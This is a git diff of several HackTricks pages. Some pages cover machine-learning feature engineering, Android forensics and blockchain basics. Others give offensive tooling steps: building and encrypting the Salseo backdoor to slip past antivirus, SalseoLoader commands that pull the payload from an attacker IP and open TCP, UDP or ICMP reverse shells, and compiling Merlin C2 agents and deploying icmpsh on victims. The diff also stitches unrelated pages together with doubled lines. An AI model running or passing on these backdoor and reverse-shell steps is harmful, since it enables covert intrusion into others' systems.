In this series of notebook we are going to build an **hybrid malware classifier.** In this series of notebook we are going to build an **hybrid malware classifier.**


@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# ML Basics
<details> <details>


@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Feature Engineering # Basic types of possible data
## Basic types of possible data
Data can be **continuous** (**infinite** values) or **categorical** (nominal) where the amount of possible values is **limited**. Data can be **continuous** (**infinite** values) or **categorical** (nominal) where the amount of possible values is **limited**.
### Categorical types ## Categorical types
#### Binary ### Binary
Just **2 possible values**: 1 or 0. If the values in a dataset are in string format (e.g. "True" and "False") you assign numbers to those values with: Just **2 possible values**: 1 or 0. If the values in a dataset are in string format (e.g. "True" and "False") you assign numbers to those values with:
@ -33,7 +31,7 @@ Just **2 possible values**: 1 or 0. In case in a dataset the values are in strin
dataset["column2"] = dataset.column2.map({"T": 1, "F": 0}) dataset["column2"] = dataset.column2.map({"T": 1, "F": 0})
``` ```
#### **Ordinal** ### **Ordinal**
The **values follow an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case. The **values follow an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case.
@ -52,7 +50,7 @@ possible_values_mapping = {value:idx for idx,value in enumerate(possible_values_
dataset['column2'] = dataset.column2.map(possible_values_mapping) dataset['column2'] = dataset.column2.map(possible_values_mapping)
``` ```
#### **Cyclical** ### **Cyclical**
Looks **like an ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting in. Example: The days of the week, Sunday isn't "bigger" than Monday. Looks **like an ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting in. Example: The days of the week, Sunday isn't "bigger" than Monday.
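A common trick for cyclical values (not shown in the original snippet, so take it as a sketch with hypothetical column names) is to project the value onto a circle with sine/cosine, so the last and first values of the cycle end up close together:

```python
import numpy as np
import pandas as pd

# Hypothetical day-of-week column: 0=Monday ... 6=Sunday
dataset = pd.DataFrame({"DoW": [0, 1, 2, 3, 4, 5, 6]})

# Map the cycle onto a circle so Sunday (6) lands next to Monday (0)
dataset["DoW_sin"] = np.sin(2 * np.pi * dataset.DoW / 7)
dataset["DoW_cos"] = np.cos(2 * np.pi * dataset.DoW / 7)
```

With this encoding the distance between Sunday and Monday is the same as between any other pair of consecutive days.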
@ -63,7 +61,7 @@ column2_dummies = pd.get_dummies(dataset.column2, drop_first=True)
dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1) dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1)
``` ```
#### **Dates** ### **Dates**
Dates are **continuous** **variables**. They can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one). Dates are **continuous** **variables**. They can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one).
@ -91,13 +89,13 @@ df_filled = daily_sum.reindex(idx, fill_value=0) # Fill missing values
# Get day of the week, Monday=0, Sunday=6, and week days names # Get day of the week, Monday=0, Sunday=6, and week days names
dataset['DoW'] = dataset.transaction_date.dt.dayofweek dataset['DoW'] = dataset.transaction_date.dt.dayofweek
## do the same in a different way # do the same in a different way
dataset['weekday'] = dataset.transaction_date.dt.weekday dataset['weekday'] = dataset.transaction_date.dt.weekday
# get day names # get day names
dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name()) dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name())
``` ```
#### Multi-category/nominal ### Multi-category/nominal
**More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature. **More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature.
@ -110,7 +108,7 @@ You can get a **multi-category column one-hot encoded** with `pd.get_dummies(dat
You can get a **multi-category column dummy encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes into binary features, creating **one new column per possible class minus one**, as the **last 2 classes will be reflected as "1" or "0" in the last binary column created**. This avoids perfect multicollinearity, reducing the relations between columns. You can get a **multi-category column dummy encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes into binary features, creating **one new column per possible class minus one**, as the **last 2 classes will be reflected as "1" or "0" in the last binary column created**. This avoids perfect multicollinearity, reducing the relations between columns.
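As a quick sanity check of the column counts (toy data, hypothetical column name):

```python
import pandas as pd

dataset = pd.DataFrame({"column1": ["red", "green", "blue", "green"]})

onehot = pd.get_dummies(dataset.column1)                    # one column per class
dummies = pd.get_dummies(dataset.column1, drop_first=True)  # one column per class minus one

print(onehot.shape[1], dummies.shape[1])
```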
## Collinear/Multicollinearity # Collinear/Multicollinearity
Collinearity appears when **2 features are related to each other**. Multicollinearity appears when there are more than 2. Collinearity appears when **2 features are related to each other**. Multicollinearity appears when there are more than 2.
@ -128,7 +126,7 @@ X = add_constant(onehot_encoded) # Add previously one-hot encoded data
print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns)) print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns))
``` ```
## Categorical Imbalance # Categorical Imbalance
This occurs when there is **not the same amount of each category** in the training data. This occurs when there is **not the same amount of each category** in the training data.
@ -177,7 +175,7 @@ You can use the argument **`sampling_strategy`** to indicate the **percentage**
Undersampling and oversampling aren't perfect: if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original, you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data. Undersampling and oversampling aren't perfect: if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original, you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data.
{% endhint %} {% endhint %}
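If you don't want to depend on `imblearn`, a naive random oversampling can be sketched with `sklearn.utils.resample` (toy data, hypothetical column names):

```python
import pandas as pd
from sklearn.utils import resample

# Imbalanced toy dataset: 8 samples of class 0, 2 of class 1
dataset = pd.DataFrame({"feature": range(10),
                        "target": [0] * 8 + [1] * 2})

majority = dataset[dataset.target == 0]
minority = dataset[dataset.target == 1]

# Duplicate minority rows at random until both classes have the same size
minority_up = resample(minority, replace=True,
                       n_samples=len(majority), random_state=42)
balanced = pd.concat([majority, minority_up])
```

This is exactly the "raw" oversampling the text warns about: the duplicated rows change the statistics of the training data.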
### SMOTE oversampling ## SMOTE oversampling
**SMOTE** is usually a **more reliable way to oversample the data**. **SMOTE** is usually a **more reliable way to oversample the data**.
@ -192,13 +190,13 @@ dataset['target_column'] = y_smote
print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore
``` ```
## Rarely Occurring Categories # Rarely Occurring Categories
Imagine a dataset where one of the target classes **occurs very few times**. Imagine a dataset where one of the target classes **occurs very few times**.
This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than the "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could also be used here, but generally those techniques **won't give really good results**. This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than the "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could also be used here, but generally those techniques **won't give really good results**.
### Weights ## Weights
In some algorithms it's possible to **modify the weights of the targeted data** so some of them get more importance by default when generating the model. In some algorithms it's possible to **modify the weights of the targeted data** so some of them get more importance by default when generating the model.
@ -209,13 +207,13 @@ model = LogisticRegression(class_weight=weights)
You can **mix the weights with over/under-sampling techniques** to try to improve the results. You can **mix the weights with over/under-sampling techniques** to try to improve the results.
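A minimal scikit-learn sketch of the idea (synthetic data; the exact weight values are arbitrary):

```python
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression

# Synthetic imbalanced dataset: ~90% class 0, ~10% class 1
X, y = make_classification(n_samples=200, weights=[0.9, 0.1], random_state=0)

# Give the minority class 10x more importance when fitting
model = LogisticRegression(class_weight={0: 1, 1: 10}).fit(X, y)

# class_weight="balanced" derives the weights from class frequencies instead
balanced_model = LogisticRegression(class_weight="balanced").fit(X, y)
```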
### PCA - Principal Component Analysis ## PCA - Principal Component Analysis
It's a method that helps reduce the dimensionality of the data. It's going to **combine different features** to **reduce their number**, generating **more useful features** (_less computation is needed_). It's a method that helps reduce the dimensionality of the data. It's going to **combine different features** to **reduce their number**, generating **more useful features** (_less computation is needed_).
The resulting features aren't understandable by humans, so it also **anonymizes the data**. The resulting features aren't understandable by humans, so it also **anonymizes the data**.
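A minimal scikit-learn sketch, reducing the 4 iris features to 2 combined components:

```python
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA

X = load_iris().data                # 150 samples, 4 original features
pca = PCA(n_components=2)
X_reduced = pca.fit_transform(X)    # combined into 2 new features

# How much of the original variance the 2 components keep
print(pca.explained_variance_ratio_.sum())
```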
## Incongruent Label Categories # Incongruent Label Categories
Data might have mistakes from unsuccessful transformations or just because of human error when writing the data. Data might have mistakes from unsuccessful transformations or just because of human error when writing the data.
@ -225,7 +223,7 @@ You can clean this issues by lowercasing everything and mapping misspelled label
It's very important to check that **all the data you have is correctly labeled**, because, for example, one misspelling in the data, when dummy encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created. It's very important to check that **all the data you have is correctly labeled**, because, for example, one misspelling in the data, when dummy encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created.
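A sketch of that cleanup (toy data; the misspellings and the mapping are made up):

```python
import pandas as pd

dataset = pd.DataFrame({"label": ["Dog", "dog ", "DOG", "doge", "cat"]})

# Normalize case/whitespace first, then map known misspellings to the canonical label
dataset["label"] = dataset.label.str.strip().str.lower()
dataset["label"] = dataset.label.replace({"doge": "dog"})

print(dataset.label.value_counts())
```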
## Missing Data # Missing Data
Some data of the study may be missing. Some data of the study may be missing.
@ -293,7 +291,7 @@ dataset.iloc[10:20] # Get some indexes that contained empty data before
To fill categorical data, first of all you need to think whether there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe you can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended). To fill categorical data, first of all you need to think whether there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe you can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended).
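Both options can be sketched with `fillna` (toy data, hypothetical column name):

```python
import numpy as np
import pandas as pd

dataset = pd.DataFrame({"payment": ["card", np.nan, "cash", np.nan]})

# Option 1: turn "missing by choice" into its own category
dataset["payment_cat"] = dataset.payment.fillna("not_given")

# Option 2 (not recommended): fill with the mode, the most used category
dataset["payment_mode"] = dataset.payment.fillna(dataset.payment.mode()[0])
```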
## Combining Features # Combining Features
If you find **two features** that are **correlated** with each other, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**. If you find **two features** that are **correlated** with each other, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**.
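For example (hypothetical correlated features, chosen only for illustration):

```python
import pandas as pd

# total_price and n_items are strongly correlated; combine them instead of dropping one
dataset = pd.DataFrame({"total_price": [10.0, 30.0, 8.0],
                        "n_items": [2, 6, 2]})

dataset["price_per_item"] = dataset.total_price / dataset.n_items
```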


@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# About the author ## Hello!!
### Hello!!
This is **Carlos Polop**. This is **Carlos Polop**.
@ -27,7 +25,7 @@ First of all, I want to indicate that **I don't own this entire book**, a lot of
I also want to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that I then add to Hacktricks. I also want to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learn new hacking techniques that I then add to Hacktricks.
### BIO ## BIO
* I've worked in different companies as sysadmin, developer and **pentester** * I've worked in different companies as sysadmin, developer and **pentester**
* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity** * I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity**
@ -37,7 +35,7 @@ I also wants to say **thanks to all the people that share cyber-security related
* I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng) * I'm also the developer of [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng)
* And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking** * And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**
### Support HackTricks ## Support HackTricks
Thank you for **reading this**! Thank you for **reading this**!


@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Android Forensics # Locked Device
## Locked Device
To start extracting data from an Android device it has to be unlocked. If it's locked you can: To start extracting data from an Android device it has to be unlocked. If it's locked you can:
@ -27,17 +25,17 @@ To start extracting data from an Android device it has to be unlocked. If it's l
* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) * Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) * Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
## Data Acquisition # Data Acquisition
Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
## If root access or physical connection to JTAG interface

* `cat /proc/partitions` (search the path to the flash memory; generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
* `df /data` (discover the block size of the system).
* `dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096` (execute it with the block size gathered in the previous step).
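The `/proc/partitions` step can be automated; a small Python sketch (the helper name is mine, and it parses a captured copy of the file) that picks the biggest entry, which is normally the whole-flash device you want to image with `dd`:

```python
def largest_block_device(proc_partitions: str):
    """Return (name, size_in_1K_blocks) of the biggest /proc/partitions entry.
    The whole flash (e.g. mmcblk0) is normally the largest device listed."""
    best_name, best_blocks = "", 0
    for line in proc_partitions.splitlines():
        fields = line.split()
        # data rows look like: major minor #blocks name (header row is skipped)
        if len(fields) == 4 and fields[2].isdigit():
            blocks = int(fields[2])
            if blocks > best_blocks:
                best_name, best_blocks = fields[3], blocks
    return best_name, best_blocks

sample = """major minor  #blocks  name

 179        0   15388672 mmcblk0
 179        1      65536 mmcblk0p1
 179        2    1048576 mmcblk0p2
"""
print(largest_block_device(sample))
```

The returned name maps to `/dev/block/<name>`, the `if=` argument of the `dd` command above.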
## Memory

Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

<details>
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
# Client side

Execute the script: **run.sh**
@@ -39,7 +37,7 @@ echo Please insert the IP where you want to listen

read IP
```

# **Victim Side**

Upload **icmpsh.exe** to the victim and execute:
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

# Installation

## Install GO
```
#Download GO package from: https://golang.org/dl/
```

@@ -36,24 +34,24 @@ Add "export GOBIN=$GOPATH/bin"

source /etc/profile
```
## Install Merlin

```
go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/
```
# Launch Merlin Server

```
go run cmd/merlinserver/main.go -i
```
# Merlin Agents

You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)

## Compile Agents

Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_

@@ -64,13 +62,13 @@ make windows #Server and Agents for Windows

make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)
```
## **Manual compile agents**

```
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g
```
# Modules

**The bad news is that every module used by Merlin is downloaded from the source (github) and saved on disk before being used. Forget about using well-known modules because Windows Defender will catch you!**\

@@ -103,7 +101,7 @@ GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -

**Didn't check persistence modules**

# Summary

I really like the feeling and the potential of the tool.\
I hope the tool will start downloading the modules from the server and integrate some kind of evasion when downloading scripts.
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

# Compiling the binaries

Download the source code from github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
@@ -35,18 +33,18 @@ Then, build both projects (Build -> Build Solution) (Inside the logs will appear

![](<../.gitbook/assets/image (1).png>)

# Prepare the Backdoor

First of all, you will need to encode the **EvilSalsa.dll**. To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
## **Python**

```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
## Windows

```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>

@@ -57,9 +55,9 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco

**Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...**
# **Execute the backdoor**

## **Getting a TCP reverse shell (downloading encoded dll through HTTP)**

Remember to start a nc as the reverse shell listener, and an HTTP server to serve the encoded evilsalsa.

@@ -67,7 +65,7 @@ Remember to start a nc as the reverse shell listener, and an HTTP server to serve

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
## **Getting a UDP reverse shell (downloading encoded dll through SMB)**

Remember to start a nc as the reverse shell listener, and an SMB server to serve the encoded evilsalsa (impacket-smbserver).

@@ -75,11 +73,11 @@ Remember to start a nc as the reverse shell listener, and an SMB server to serve

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
## **Getting an ICMP reverse shell (encoded dll already inside the victim)**

**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)

### **Disable ICMP Replies:**

```
sysctl -w net.ipv4.icmp_echo_ignore_all=1

@@ -88,45 +86,45 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1

sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
### Execute the client:

```
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
```
### Inside the victim, let's execute the salseo thing:

```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
# Compiling SalseoLoader as DLL exporting main function

Open the SalseoLoader project using Visual Studio.

## Add before the main function: \[DllExport]

![](<../.gitbook/assets/image (2).png>)

## Install DllExport for this project

### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**

![](<../.gitbook/assets/image (3).png>)

### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**

![](<../.gitbook/assets/image (4).png>)

The files **DllExport.bat** and **DllExport\_Configure.bat** have appeared in your project folder.
## Uninstall DllExport

Press **Uninstall** (yeah, it's weird but trust me, it is necessary)

![](<../.gitbook/assets/image (5).png>)

## **Exit Visual Studio and execute DllExport\_configure**

Just **exit** Visual Studio
@@ -136,13 +134,13 @@ Select **x64** (if you are going to use it inside a x64 box, that was my case),

![](<../.gitbook/assets/image (7).png>)

## **Open the project again with Visual Studio**

**\[DllExport]** should no longer be marked as an error

![](<../.gitbook/assets/image (8).png>)
## Build the solution

Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

@@ -154,7 +152,7 @@ Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> P

To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
## Test the generated Dll

Copy and paste the Dll where you want to test it.

@@ -166,11 +164,11 @@ rundll32.exe SalseoLoader.dll,main

If no error appears, you probably have a functional dll!
# Get a shell using the Dll

Don't forget to use an **HTTP server** and set a **nc listener**

## Powershell
```
$env:pass="password"

@@ -181,7 +179,7 @@ $env:shell="reversetcp"

rundll32.exe SalseoLoader.dll,main
```

## CMD

```
set pass=password
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>

# Basic Terminology

* **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediary's involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)).
* Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored immutable) and can be read by the people before accepting them.
@@ -31,26 +29,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

* **DEX: Decentralized Exchange Platforms**.
* **DAOs**: **Decentralized Autonomous Organizations**.

# Consensus Mechanisms

For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**.

Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.
## Proof Of Work (PoW)

This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.\
The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more likely to **finish the Proof of Work earlier** and get the fees of all the transactions.
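As an illustration only (a toy, not Bitcoin's actual double-SHA256 target arithmetic), the "work" consists of grinding a nonce until the block hash meets a difficulty condition, while verifying a solution takes a single hash:

```python
import hashlib

def mine(block_data: bytes, difficulty: int) -> int:
    """Grind nonces until the hash starts with `difficulty` zero hex digits
    (a toy stand-in for Bitcoin's difficulty target)."""
    nonce = 0
    while True:
        h = hashlib.sha256(block_data + str(nonce).encode()).hexdigest()
        if h.startswith("0" * difficulty):
            return nonce
        nonce += 1

nonce = mine(b"tx1;tx2;tx3", difficulty=4)
# finding the nonce took ~16^4 hashes on average; checking it takes one
assert hashlib.sha256(b"tx1;tx2;tx3" + str(nonce).encode()).hexdigest().startswith("0000")
```

This asymmetry (expensive to find, cheap to verify) is what forces an attacker to match the network's hash power.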
## Proof Of Stake (PoS)

PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\
In this kind of consensus, the more tokens a miner has, the more likely it is that the miner will be asked to create the next block.\
Compared with PoW, this greatly **reduces the energy consumption** the miners are expending.
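The selection rule can be sketched as a stake-weighted lottery (illustrative only, not any real chain's algorithm; the names are made up):

```python
import random

def next_proposer(stakes: dict, rng: random.Random) -> str:
    """Pick a validator with probability proportional to its staked tokens."""
    validators = list(stakes)
    return rng.choices(validators, weights=[stakes[v] for v in validators])[0]

stakes = {"alice": 90, "bob": 9, "carol": 1}
rng = random.Random(0)
wins = {v: 0 for v in stakes}
for _ in range(10_000):
    wins[next_proposer(stakes, rng)] += 1
# alice holds 90% of the stake, so she proposes roughly 90% of the blocks
```

To control block production an attacker must buy a majority of the stake, mirroring the hash-power requirement in PoW.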
# Bitcoin

## Transactions

A simple **transaction** is a **movement of money** from one address to another.\
An **address** in bitcoin is the hash of the **public key**; therefore, in order to make a transaction from an address, someone needs to know the private key associated with that public key (the address).\
@@ -79,11 +77,11 @@ Once R and S have been calculated, they are serialized into a byte stream that i

Verification of a signature effectively means that only the owner of the private key (that generated the public key) could have produced the signature on the transaction. The signature verification algorithm will return TRUE if the signature is indeed valid.

### Multisignature Transactions

A multi-signature **address** is an address that is associated with more than one ECDSA private key. The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address.
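The m-of-n rule can be sketched like this (illustrative Python; a real node runs ECDSA verification for each key, which is stubbed here as a string check):

```python
def multisig_spendable(signatures, authorized_keys, m):
    """m-of-n check: count how many distinct authorized keys produced a valid
    signature. `verify` is a stub for real ECDSA verification."""
    def verify(key, sig):
        return sig == "sig-by-" + key
    valid_keys = {k for k, s in signatures if k in authorized_keys and verify(k, s)}
    return len(valid_keys) >= m

keys = {"key1", "key2", "key3"}                            # n = 3
sigs = [("key1", "sig-by-key1"), ("key3", "sig-by-key3")]
assert multisig_spendable(sigs, keys, m=2)                 # 2-of-3: spendable
assert not multisig_spendable(sigs[:1], keys, m=2)         # one signature is not enough
```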
### Transaction Fields

Each bitcoin transaction has several fields:

@@ -98,7 +96,7 @@ There are **2 main types** of transactions:

* **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash; if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security.
* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person who wants this money sends a script) that, if **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and it results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets, making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1`, making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one.
## Lightning Network

This protocol helps to **perform several transactions in a channel** and **send just the final state** to the blockchain to save it.\
This **improves** bitcoin blockchain **speed** (it only allows 7 payments per second) and it allows the creation of **transactions that are more difficult to trace**, as the channel is created via nodes of the bitcoin blockchain:

@@ -109,27 +107,27 @@ Normal use of the Lightning Network consists of **opening a payment channel** by

Note that either member of the channel can stop and send the final state of the channel to the blockchain at any time.
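The idea can be sketched with a toy channel (illustrative Python, amounts in satoshis; real Lightning uses commitment transactions and HTLCs, which are omitted here):

```python
class ToyChannel:
    """Many off-chain balance updates; only the closing state reaches the chain."""
    def __init__(self, a, b, deposit_a, deposit_b):
        self.balances = {a: deposit_a, b: deposit_b}
        self.offchain_updates = 0

    def pay(self, src, dst, amount):
        assert self.balances[src] >= amount
        self.balances[src] -= amount
        self.balances[dst] += amount
        self.offchain_updates += 1        # nothing is broadcast at this point

    def close(self):
        return dict(self.balances)        # the ONE transaction written on-chain

ch = ToyChannel("alice", "bob", 500, 500)
for _ in range(100):
    ch.pay("alice", "bob", 1)
final = ch.close()                        # 100 payments, a single on-chain settlement
assert final == {"alice": 400, "bob": 600}
```

An on-chain observer sees only the opening deposit and the closing split, not the 100 intermediate payments.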
# Bitcoin Privacy Attacks

## Common Input

Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belong to the same owner**.
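Chain-analysis tools turn this assumption into address clustering; a minimal union-find sketch (illustrative, the class and method names are mine):

```python
class AddressClusters:
    """Union-find over addresses: all inputs of one transaction are merged
    into one presumed owner (common-input-ownership heuristic)."""
    def __init__(self):
        self.parent = {}

    def find(self, a):
        self.parent.setdefault(a, a)
        while self.parent[a] != a:
            self.parent[a] = self.parent[self.parent[a]]   # path halving
            a = self.parent[a]
        return a

    def observe_tx(self, input_addresses):
        first = input_addresses[0]
        for addr in input_addresses[1:]:
            self.parent[self.find(addr)] = self.find(first)

    def same_owner(self, a, b):
        return self.find(a) == self.find(b)

c = AddressClusters()
c.observe_tx(["addr1", "addr2"])
c.observe_tx(["addr2", "addr3"])
assert c.same_owner("addr1", "addr3")      # linked through addr2
assert not c.same_owner("addr1", "addr9")
```

Note the transitivity: two addresses never seen together in one transaction still get clustered through a shared intermediate.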
## UTXO Change Address Detection

**UTXO** means **Unspent Transaction Output**. In a transaction that uses the output from a previous transaction as an input, the **whole output needs to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other part**, **2 different outputs** will appear: the **intended one** and a **random new change address** where the rest of the money will be saved.

Then, a watcher can make the assumption that **the new change address generated belongs to the owner of the UTXO**.
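A sketch of why the change output exists (illustrative Python; the address names are placeholders, amounts in satoshis):

```python
def spend_utxo(utxo_value, payment, fee):
    """The whole UTXO is consumed; whatever isn't paid or burnt as fee must
    return to a fresh change address - which a watcher can tie to the sender."""
    assert payment + fee <= utxo_value
    outputs = [("recipient_address", payment)]
    change = utxo_value - payment - fee
    if change:
        outputs.append(("fresh_change_address", change))
    return outputs

# spend a 100k-satoshi UTXO to pay 60k with a 1k fee -> 39k comes back as change
assert spend_utxo(100_000, 60_000, 1_000) == [
    ("recipient_address", 60_000),
    ("fresh_change_address", 39_000),
]
```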
## Social Networks & Forums

Some people give out their bitcoin addresses on different websites on the Internet. **This makes it pretty easy to identify the owner of an address**.

## Transaction Graphs

By representing the transactions in graphs, **it's possible to know with some probability where the money of an account went**. Therefore, it's possible to know something about **users** that are **related** in the blockchain.

## **Unnecessary input heuristic**

